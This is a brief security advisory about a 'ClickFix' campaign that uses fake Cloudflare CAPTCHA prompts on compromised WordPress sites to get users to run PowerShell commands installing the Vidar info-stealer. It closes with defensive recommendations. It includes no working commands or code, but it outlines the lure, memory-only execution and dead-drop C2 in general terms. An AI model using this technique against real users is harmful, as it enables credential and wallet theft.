ClickFix Social‑Engineering Campaign Delivers Vidar Stealer Malware to Australian Organizations
What Happened – The Australian Cyber Security Centre (ACSC) has identified an active “ClickFix” campaign that uses fake Cloudflare CAPTCHA prompts on compromised WordPress sites to trick users into running malicious PowerShell commands. The commands download and execute the Vidar Stealer info‑stealer, which harvests browser credentials, cookies, crypto wallets and system details.
Why It Matters for TPRM –
- Supply‑chain compromise of third‑party web platforms can expose downstream partners to credential theft.
- PowerShell‑based payload delivery bypasses many endpoint controls, increasing risk to corporate networks.
- Vidar’s memory‑only operation reduces forensic visibility, making detection and incident response harder.
Who Is Affected – Government agencies, critical infrastructure operators, and any enterprises that host or consume services from WordPress‑based web properties in Australia.
Recommended Actions –
- Enforce PowerShell execution restrictions and enable application allow‑listing.
- Harden WordPress installations: apply all theme/plugin patches, remove unused components, and monitor for unauthorized changes.
- Deploy ACSC‑provided IoCs and monitor for “dead‑drop” C2 traffic on Telegram, Steam and other public services.
Technical Notes – The attack leverages social engineering (fake CAPTCHA) to deliver a PowerShell command that pulls the Vidar binary, which self‑deletes after launch and runs from memory. Vidar retrieves C2 endpoints via dead‑drop URLs hosted on public platforms. No specific CVE is cited; the vector is a misused legitimate verification flow. Source: BleepingComputer